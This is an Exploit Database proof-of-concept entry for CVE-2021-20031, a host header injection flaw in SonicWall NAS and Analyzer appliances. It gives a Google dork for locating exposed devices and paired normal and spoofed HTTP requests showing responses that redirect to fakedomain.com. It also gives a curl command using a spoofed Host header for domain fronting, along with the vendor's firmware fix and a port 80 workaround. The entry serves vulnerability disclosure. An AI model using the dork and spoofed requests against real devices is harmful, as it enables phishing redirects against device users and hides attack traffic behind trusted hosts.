Sonicwall SonicOS 7.0 – Host Header Injection

Exploit Database
180 阅读

作者： Ramikan

日期： 2021-10-13
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/50414/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

# Exploit Title: Sonicwall SonicOS 7.0 - Host Header Injection

# Google Dork: inurl:"auth.html" intitle:"SonicWall"

#intitle:"SonicWall Analyzer Login"

# Discovered Date: 03/09/2020

# Reported Date: 07/09/2020

# Exploit Author: Ramikan

# Vendor Homepage:sonicwall.com

# Affected Devices: All SonicWall Next Gen 6 Devices

# Tested On: SonicWall NAS 6.2.5

# Affected Version: All SonicWall Next Gen 6 Devices till 6.5.3

# Fixed Version:Gen6 firmware 6.5.4.8-89n

# CVE : CVE-2021-20031

# CVSS v3:5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

# Category:Hardware, Web Apps

# Reference : https://github.com/Ramikan/Vulnerabilities/

*************************************************************************************************************************************

Vulnerability 1: Host Header Injection

*************************************************************************************************************************************

Description:

A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages.

An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack

Impact:

Host Header changed to different domain (fakedomain.com).

Fakedomain.com can be found in two lines in the HTTP response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";

ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************

Normal Request

*************************************************************************************************************************************

GET / HTTP/1.1

Host: 192.168.10.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

*************************************************************************************************************************************

Normal Response

*************************************************************************************************************************************

HTTP/1.0 200 OK

Server: SonicWALL

Expires: -1

Cache-Control: no-cache

Content-type: text/html; charset=UTF-8;

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

++++++++++++++++++snipped+++++++++++++++++++++++

</head>

</div>

Network Security Appliance

</div>

Please be patient as you are being re-directed to <a href="https://192.168.10.1/auth.html" target="_top">a secure login page</a>

</div>

</div>

</body>

</html>

*************************************************************************************************************************************

POC

*************************************************************************************************************************************

Host Header changed to different domain (fakedomain.com).

Fakedomain.com can be found in two lines in the response, below are the two lines.

var jumpURL = "https://fakedomain.com/auth.html";

ease be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

*************************************************************************************************************************************

Request:

*************************************************************************************************************************************

GET / HTTP/1.1

Host: fakedomain.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Upgrade-Insecure-Requests: 1

Connection: close

Cookie: temp=

*************************************************************************************************************************************

Response:

*************************************************************************************************************************************

HTTP/1.0 200 OK

Server: SonicWALL

Expires: -1

Cache-Control: no-cache

Content-type: text/html; charset=UTF-8;

X-Content-Type-Options: nosniff

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<title>Document Moved</title>

var resetSecureFlag = false;

setTimeout("goJump();", 1000);

function goJump() {

var jumpURL = "https://fakedomain.com/auth.html";

var jumpProt = jumpURL.substr(0,6).toLowerCase();

var ix;

if (jumpProt.substr(0,4) == "http" && (ix = jumpProt.indexOf(":")) != -1) {

jumpProt = jumpProt.substr(0,ix+1);

if (location.protocol.toLowerCase() != jumpProt) {

window.opener = null;

top.opener = null;

}

if (resetSecureFlag) {

var sessId = getCookie("SessId");

var pageSeed = swlStore.get("PageSeed", {isGlobal: true});

if (sessId) { setCookieExt("SessId", sessId, { strictSameSite: true }); }

if (pageSeed) { swlStore.set("PageSeed", pageSeed, {isGlobal: true}); }

}

top.location.href = jumpURL;

}

function setCookie(key, value) {

var argv = setCookie.arguments;

var argc = setCookie.arguments.length;

var expires = (argc > 2) ? argv[2] : null;

var path = (argc > 3) ? argv[3] : null;

var domain = (argc > 4) ? argv[4] : null;

var secure = (argc > 5) ? argv[5] : false;

document.cookie = key + "=" + escape (value) +

((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +

((path == null) ? "" : ("; path=" + path)) +

((domain == null) ? "" : ("; domain=" + domain)) +

((secure == true) ? "; secure" : "");

}

function getCookie(key) {

if (document.cookie.length) {

var cookies = ' ' + document.cookie;

var start = cookies.indexOf(' ' + key + '=');

if (start == -1) {

return null;

}

var end = cookies.indexOf(";", start);

if (end == -1) {

end = cookies.length;

}

end -= start;

var cookie = cookies.substr(start,end);

return unescape(cookie.substr(cookie.indexOf('=') + 1, cookie.length - cookie.indexOf('=') + 1));

} else {

return null;

}

</script>

</head>

</div>

Network Security Appliance

</div>

Please be patient as you are being re-directed to <a href="https://fakedomain.com/auth.html" target="_top">a secure login page</a>

</div>

</div>

</body>

</html>

The redirection is happening to https://fakedomain.com/auth.html.

*************************************************************************************************************************************

Attack Vector:

*************************************************************************************************************************************

Can be used for domain fronting.

curl -k --header "Host: attack.host.net" "Domain Name of the Sonicwall device"

*************************************************************************************************************************************

Vendor Response:

*************************************************************************************************************************************

Fix: SonicWall has fixed the issue in Gen6 firmware 6.5.4.8-89n (build is available in mysonicwall.com) -fix is provided with a CLI option > configure > administration > enforce-http-host-check,to avoid Host header redirection.

Workaround: Please disable port 80 to mitigate it and this issue affected all Gen6 firewall products.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019

*************************************************************************************************************************************